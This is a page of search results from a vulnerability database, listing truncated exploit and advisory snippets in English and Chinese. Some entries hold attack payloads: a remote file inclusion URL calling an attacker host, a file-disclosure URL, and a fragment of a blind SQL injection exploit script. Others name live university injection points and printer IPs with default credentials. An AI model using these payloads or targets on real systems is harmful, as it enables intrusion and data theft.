56796 matches found
deV!Lz Clanportal [DZCP] <= 1.3.6 - Arbitrary File Upload Vulnerability
No description provided by source. S Y N O P S I S / =================' - access: remote severity: high - deV!Lz Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP code and execute it,...
Microsoft IIS FTPd服务NLST命令远程栈溢出漏洞(MS09-053)
BUGTRAQ ID: 36189 CVE ID: CVE-2009-3023 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 Microsoft IIS内嵌的FTP服务器中存在栈溢出漏洞。如果远程攻击者对带有特制名称的目录发布了包含有通配符的FTP NLST(NAME LIST)命令的话,就可以触发这个溢出,导致拒绝服务或执行任意代码。仅在攻击者拥有写访问权限的情况下才可以创建带有特殊名称的目录。 Microsoft IIS 6.0 Microsoft IIS 5.1 Microsoft I...
MidiCart PHP Item_List.PHP MainGroup Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13513/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the...
Red Hat JBoss Portal安全绕过漏洞
漏洞详情: Red Hat JBoss Portal是美国红帽(RedHat)公司的一套开源且符合标准的门户平台。该平台可搭建、布局一个门户网站的Web界面,用于发布、管理内容以及定制用户体验。 Red Hat JBoss Portal 6.x版本中存在安全漏洞。攻击者可利用该漏洞绕过安全限制。 详情: apache commons-collections库的更新包,修复了一个安全问题,现在可供Red Hat JBoss Portal 6.2.0红帽客户门户。 Red Hat JBoss Portal的开源实现Java EE的服务和门户服务运行在Red Hat JBoss企业应用程序平台...
tiki wiki cms groupware 5.2 - Multiple Vulnerabilities
No description provided by source. Source: http://www.securityfocus.com/bid/43507/info Tiki Wiki CMS Groupware is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the local...
Indexu 5.0/5.3 suggest_category.php error_msg Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code execute in the...
Apache Tomcat HTTP请求走私(CVE-2021-33037)
...
ArticleBeach Script <= 2.0 (index.php) Remote File Inclusion Vulnerability
No description provided by source. ------------------------------------------------------------------------------ ArticleBeach Script = 2.0 page Remote File Inclusion Vulnerability ------------------------------------------------------------------------------ Author : Zeni Susanto a.k.a Bithedz...
Multiple vulnerabilities in Loxone Smart Home
Vendor & product description: "Loxone Electronics was founded in 2009. Our focus is the development and production of control solutions for all homes. Our aim is to make home automation interesting, affordable and accessible for everyone." URL: http://www.loxone.com/enus/company/about-us.html...
deV!Lz Clanportal [DZCP] <= 1.4.5 - Remote File Disclosure Vulnerability
No description provided by source. DZCP Devilz Clanportal = 1.4.5 Mysql Data viewable Found by: Kiba Solution: Install security Fix! Exploit: http://SITE/PATH/inc/filebrowser/browser.php?file=inc/mysql.php Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php...
VMware存在多个安全漏洞
BUGTRAQ ID:30934 CVE ID:CVE-2008-3691 CVE-2008-3692 CVE-2008-3693 CVE-2008-3694 CVE-2008-3695 CVE-2008-3696 CNCVE ID:CNCVE-20083691 CNCVE-20083692 CNCVE-20083693 CNCVE-20083694 CNCVE-20083695 CNCVE-20083696 VMWare是一款虚拟PC软件,允许在一台机器上同时运行两个或多个Windows、DOS、LINUX系统。 多个VMWare...
deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit
No description provided by source. use HTTP::Cookies; use LWP::UserAgent; my $ua = LWP::UserAgent-new cookiejar = HTTP::Cookies-new,; $ua-agent 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ; usage; print "\n"; $server = $ARGV0; $dir = $ARGV1; $username = $ARGV2; $password = $ARGV3; if !$password...
FreeBSD inet_network()函数单字节溢出漏洞
BUGTRAQ ID: 27283 CVECAN ID: CVE-2008-0122 FreeBSD就是一种运行在Intel平台上、可以自由使用的开放源码Unix类系统。 FreeBSD的inetnetwork函数中的单字节溢出可能由某些输入导致内存破坏,本地攻击者可能利用此漏洞提升权限或导致拒绝服务。 如果程序向inetnetwork传送不可信任数据的话,攻击者就可以通过向inetnetwork传送特制输入导致用用户定义的数据覆盖内存区域。攻击者可以在使用inetnetwork的程序中导致拒绝服务或执行代码,具体取决于所覆盖的内存区域。 FreeBSD FreeBSD 7.0...
Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit
No description provided by source. ? WordPress Adserve plugin v 0.2 Sql Injection Exploit Plugin Homepage-http://www.irisco.it/?pageid=40 Found by:enterthedragon Vuln code -In adclick.php if isset$GET'id' Header"Location: ".iriAdServeBannerClick$GET'id' -In iriAdServeBannerClick function return...
Apache 'mod_isapi' Memory Corruption Vulnerability
CVE:CVE-2010-0425 Apache is prone to a memory-corruption vulnerability. Attackers can leverage this vulnerability to execute arbitrary code with SYSTEM privileges; failed attacks may result in denial-of-service conditions. Apache versions prior to 2.2.15 are affected. Slackware Linux x8664 -curre...
Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/22667/info Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues. An attacker can exploit these issues to steal cookie-base...
华天动力OA系统弱口令加任意文件上传,分秒钟沦陷服务器
简要描述: 华天动力OA系统弱口令加任意文件上传,分秒钟沦陷服务器 详细说明: 华天动力OA系统默认存在弱口令用户,登录弱口令用户后可上传任意文件,直接拿shell,并且由于系统数据库是root,权限很高,服务器直接沦陷 漏洞证明: 1.下载华天最新版OA http://software.oa8000.com/download/Version/V7.0/11-TAMYSQL5D-%E8%AF%95%E7%94%A8%E7%89%88%E5%B8%A6%E6%95%B0%E6%8D%AE%E4%B8%89%E5%90%88%E4%B8%80MYSQLPUE-7.0-2015-06-29.e...
强智科技教务系统存在SQL注入漏洞导致多校中枪……
简要描述: 强智科技教务系统存在SQL注入漏洞,多校中枪…… 详细说明: 这个算是CMS吧? 中枪学校及注入点 湖南商学院:http://jwgl.hnuc.edu.cn/Public/ShowGGTZ.asp?GGTZID=317【这里】 北京城市学院:http://114.255.66.248/jiaowu/Public/ShowGGTZ.asp?GGTZID=218【这里】 焦作大学:http://jw.jzu.cn/jiaowu/Public/ShowGGTZ.asp?GGTZID=1155【这里】...
金蝶协同办公系统 GETSHELL漏洞
简要描述: 详细说明: 金蝶OA系统在web.xml中配置了一个servlet Connector,是基于旧版本的fckeditor,存在任意文件上传漏洞,配置如下: com.fredck.FCKeditor.connector.ConnectorServlet.class反编译出主要代码如下: public void doPostHttpServletRequest request, HttpServletResponse response throws ServletException, IOException …… String commandStr =...
ESRI ArcGIS未明SQL注入漏洞
CVE ID:CVE-2013-7232 ArcGIS for Server软件平台让用户能够通过网络创建,管理和分发GIS服务,并以服务的形式支撑桌面软件应用,移动终端应用和网络地图应用等。 ArcGIS for Server存在未明SQL注入漏洞,允许远程攻击者利用漏洞提交特制的SQL查询,可操作或获取数据库数据。 漏洞与地图的输入有关。 0 ESRI ArcGIS for Server 10.2 厂商补丁: ESRI ----- 用户可参考如下厂商提供的安全公告获得补丁信息:...
强智科技教务管理系统注入漏洞可改成绩
简要描述: 昨天无聊 就去一个朋友的大学的教务处看了看。心想说不定能帮他改改挂科成绩 详细说明: 看了一下是一个叫强智科技教务管理系统 google发现爆出过漏洞 登录框POST注入。。 Mssql数据库 我试了试 不知道是哪里的问题 换了好几个工具 都读不出表名 显示的是sa 但是恢复xpcmdshell 失败 执行命令失败 无奈放到Jsky里去扫 惊喜的发现有网站源码 下载下来 发现教务管理系统有一个很鸡肋的BBS 基本上没人登录 BBS的管理员密码默认就是教务管理员密码 但存在另一个表单里 明文显示 这下爽了 先去论坛注册一个用户 然后直接手工注入爆管理员账号密码 顺利进入后台...
Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (PPC Edition)
No description provided by source. / Linux socksendpage NULL pointer dereference Copyright 2009 Ramon de Carvalho Valle [email protected] This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Softwar...
通达OA任意文件上传漏洞
No description provided by source...
ETERNALBLUE - Remote RCE via SMB & NBT (Windows XP to Windows 2012)
From the shadowbroker, Windows XP to Windows 2012 SMB remote code execution vulnerability, corresponding to the number ETERNALBLUE it. CVE-2017-0143 CVE-2017-0144 CVE-2017-0145 CVE-2017-0146 CVE-2017-0147 CVE-2017-0148 Reference:...
HPE Integrated Lights-Out 4 Remote Code Execution Vulnerability(CVE-2017-12542)
Subverting your server through its BMC: the HPE iLO4 case ========================================================= Introduction ------------ iLO is the server management solution embedded in almost every HP servers for more than 10 years. It provides every feature required by a system...
"Phoenix Talon" in Linux Kernel (Phoenix Talon)
About “Phoenix Talon” 2017 5 November 9, qimingxing e ADLab found that the Linux kernel there is a remote vulnerability“Phoenix Talon”the Phoenix claw fourth toe of Italy, and relates to CVE-2017-8890, CVE-2017-9075, CVE-2017-9076, CVE-2017-9077, can affect almost all Linux kernel 2.5.69 Linux...
PHPExcel XML外部实体处理漏洞
CVE ID:CVE-2014-2054 PHPExcel是用来操作Office Excel文档的一个PHP类库,它基于微软的OpenXML标准和PHP语言。 PHPExcel在解析XML实体时存在错误,允许攻击者利用漏洞提交包含外部实体引用的XML文档,获取系统文件内容信息。 0 PHPExcel 1.x PHPExcel 1.8.0已经修复该漏洞,建议用户下载更新: https://github.com/PHPOffice/PHPExce...
Apache HTTP Server多个拒绝服务漏洞
BUGTRAQ ID: 66303 CVE ID: CVE-2013-6438,CVE-2014-0098 Apache HTTP Server是开源HTTP服务器。 Apache HTTP Server 2.4.7, 2.4.6, 2.4.4, 2.4.3, 2.4.2, 2.4.1在实现上存在安全漏洞,可被恶意利用造成拒绝服务。 1、记录截断cookie时,modlogconfig模块存在错误,可被利用造成工作线程崩溃。要成功利用此漏洞需要使用线程化MPM。 2、删除前导空格时,moddav模块存在边界错误,可被利用通过特制的DAV WRITE请求破坏内存。 0 Apache Gro...
Synology DiskStation Manager远程命令执行漏洞
CVE ID:CVE-2013-6955 Synology DiskStation Manager 是第一个提供网络多任务处理用户接口的NAS操作系统。 该漏洞是位于/ webman/ imageSelector.cgi,允许攻击者以root权限执行任意命。 0 Synology DiskStation Manager 4.x 目前厂商暂无提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: http:// www.synology.com This module requires Metasploit: http//metasploit.com/downlo...
国微CMS(原PHP168) SQL 注入漏洞
该系统通过以下参数调用 ask/item-confirm-category-8.html 其中item代表目录 confirm代表该目录下的文件 ask/modules/item/confirm.php $keyword = isset$GET'keyword' ? rawurldecode$GET'keyword' : ''; ifempty$keyword message'askerror', HTTPREFERER, 3; get得到keyword变量然后urldecode解码 $select = select; $select-from$thismodule-table . ' ...
74cms 最新版 注入8-9
简要描述: 骑士PHP人才系统:74cms V3.4.20140530 详细说明: GBK 2字节一汉字 UTF8 三字节 一汉字。 74cms 在读取数据库的时候 charactersetclient=binary 这样没办法来直接宽字节来注入了。 得找一些转换编码的地方。 錦 从UTF8 转成 GBK之后成了 %e5%5c 74cms对GET POST COOKIE …… 都做了addslashes 所以' 转义后为' -%5C %e5%5c%5c' 两个\ 则单引号出来 再看看74cms的全局过滤 function removexss$string $string =...
OpenSSH <=7.2p1 xauth injection
来源链接: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 VuNote Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 Version: 0.2 Date: Mar 3rd, 2016 Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass Overview Name: openssh...
Ucenter Home 2.0及以下存储型XSS
简要描述: 以后腾讯的洞发在乌云。 详细说明: 【漏洞原理】 编辑器插入视频input过滤不严,导致日志和群组模块发帖可插入代码。 【测试代码】 发帖包含以下代码: flashhttp://"...
Microsoft IIS 密码信息泄露漏洞(MS12-073)
BUGTRAQ ID: 56439 CVE ID: CVE-2012-2531 Internet Information Services(IIS,互联网信息服务)是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。 Microsoft IIS 7.5对操作日志使用了弱权限,没有正确限制对某些日志文件的访问,通过读取此文件,可允许本地用户获取已配置账户的用户名和密码。要利用此漏洞需要启用IIS的操作日志。 0 Microsoft IIS 7.x 临时解决方法: 如果已经启用了IIS的"Operational"日志,则在分配给应用池自定义账户之前,请禁用...
MySQL <= 5.7.15 remote Root code execution vulnerability
http://legalhackers.com - dawid at legalhackers.com - Release date: 12.09.2016 I. VULNERABILITY ------------------------- MySQL = 5.7.15 Remote Root Code Execution / Privilege Escalation 0day 5.6.33 5.5.52 MySQL clones are also affected, including: MariaDB PerconaDB II. BACKGROUND...
Multiple Vendors libc/glob(3) Resource Exhaustion (+0day remote ftpd-anon)
No description provided by source. Source: http://securityreason.com/securityalert/7822 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vendors libc/glob3 resource exhaustion +0day remote ftpd-anon Author: Maksymilian Arciemowicz http://netbsd.org/donations/ http://securityreason.com/...
Vegetav (news_item.php?id) Remote SQL injection Vulnerability
No description provided by source. IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Vegetav newsitem.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.vegetav.co.uk/ Persian Gulf 4 Ever! Dork : "website design by...
Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln
No description provided by source. Title: Aardvark Topsites PHP 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit: /sources/join.php?FORMurl=owned&CONFIGcaptcha=1&CONFIGpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
OpenSSH information leak Vulnerability, CVE-2016-10011)
No description provided by source...
AppWeb Authentication Bypass (Digest, Basic and Forms)(CVE-2018-8715)
Vulnerability Summary A critical vulnerability in the EmbedThis HTTP library, and Appweb versions 5.5.x, 6.x, and 7.x including the latest version present in the git repository. In detail, due to a logic flaw, with a forged HTTP request it is possible to bypass the authentication for form and...
佳能MF8040Cn打印机弱口令
佳能MF8040Cn打印机弱口令 1.dork app:"Canon i-SENSYS MF8040Cn printer http admin" 2.漏洞详情 佳能MF8040Cn打印机存在默认账号密码 1)系統管理員模式 admin admin 2)終端使用者模式 admin 3.漏洞证明 用zoomeye搜索 : app:"Canon i-SENSYS MF8040Cn printer http admin" 可见有大量设备暴露在公网上面 http://223.197.235.193 http://219.142.195.251 用admin admin 登陆 成功登陆 可查看打印信...
Microsoft IIS ASP远程代码执行漏洞(MS08-006)
BUGTRAQ ID: 27676 CVECAN ID: CVE-2008-0075 Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 IIS处理ASP网页输入的方式存在远程代码执行漏洞,允许攻击者向网站的ASP页面传送恶意输入。成功利用这个漏洞的攻击者可以在IIS服务器上以WPI的权限(默认配置为网络服务帐号权限)执行任意操作。 Microsoft IIS 6.0 Microsoft IIS 5.1 临时解决方法: 在Windows Server 2003上禁用传统风格ASP: 1...
Jolokia Vulnerabilities - RCE & XSS(CVE-2018-1000130,CVE-2018-1000129)
Recently, during a client engagement, Gotham Digital Science found a couple of zero-day vulnerabilities in the Jolokia service. Jolokia is an open source product that provides an HTTP API interface for JMX Java Management Extensions technology. It contains an API we can use for calling MBeans...
Exim 4 远程代码执行漏洞(CVE-2020-28018)
CVE-2020-28018: Exim Use-after-free UAF leading to RCE Introduction There exists a Use-after-free UAF vulnerability in tls-openssl.c that allow remote unauthenticated attackers to corrupt internal memory data, thus finally achieving remote code execution. Primitives: - x Memory Leakage - x...
Pre-auth Remote Code Execution exploit for QNAP QTS
!/usr/bin/env python -- coding: iso-8859-15 -- Pre-auth Remote Code Execution exploit for QNAP QTS 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 Beta 2 build 2017111 Just a quick dirty RCE PoC to make your QNAP sing "XMAS" in morse. Author: Andrea Palazzo @cogitoergor00t E-mail:...
Oracle WebLogic wls-wsat RCE(CVE-2017-10271)
漏洞描述 黑客利用WebLogic 反序列化漏洞(CVE-2017-3248)和WebLogic WLS 组件漏洞(CVE-2017-10271)对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-10271是一个最新的利用Oracle WebLogic中WLS 组件的远程代码执行漏洞,属于没有公开细节的野外利用漏洞,大量企业尚未及时安装补丁。官方在 2017 年 10 月份发布了该漏洞的补丁。 该漏洞的利用方法较为简单,攻击者只需要发送精心构造的 HTTP...
IIS 6.0 WebDAV remote code execution vulnerability (CVE-2017-7269)
In Windows Server 2003 IIS6. 0 the WebDAV service ScStoragePathFromUrl a function of the presence buffer overflow vulnerability, an attacker by a order“If: http://” at the beginning of a longer header head PROPFIND request arbitrary code execution. Currently the vulnerability for install IIS6...
Apache Tomcat Upload Bypass / Remote Code Execution(CVE-2017-12617)
CVE-2017-12617 CVE-2017-12617 critical Remote Code Execution RCE vulnerability discovered in Apache Tomcat affect systems with HTTP PUTs enabled via setting the "read-only" initialization parameter of the Default servlet to "false" are affected. Tomcat versions before 9.0.1 Beta, 8.5.23, 8.0.47 a...
lighttpd 'mod_mysql_vhost.c' SQL注入漏洞
BUGTRAQ ID: 66153 CVECAN ID: CVE-2014-2323 Lighttpd是一款轻型的开放源码Web Server软件包。 由于程序在进行SQL查询前未能充分过滤用户提供的输入,攻击者可以利用漏洞危及应用程序,访问或修改数据,或利用底层数据库中潜在的漏洞。 0 lighttpd 1.4.35 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.lighttpd.net...
Randombit Botan Library X509 Certificate Validation Bypass Vulnerability(CVE-2017-2801)
Summary A programming error exists in a way Randombit Botan cryptographic library version 2.0.1 implements x500 string comparisons which could lead to certificate verification issues and abuse. A specially crafted X509 certificate would need to be delivered to the client or server application in...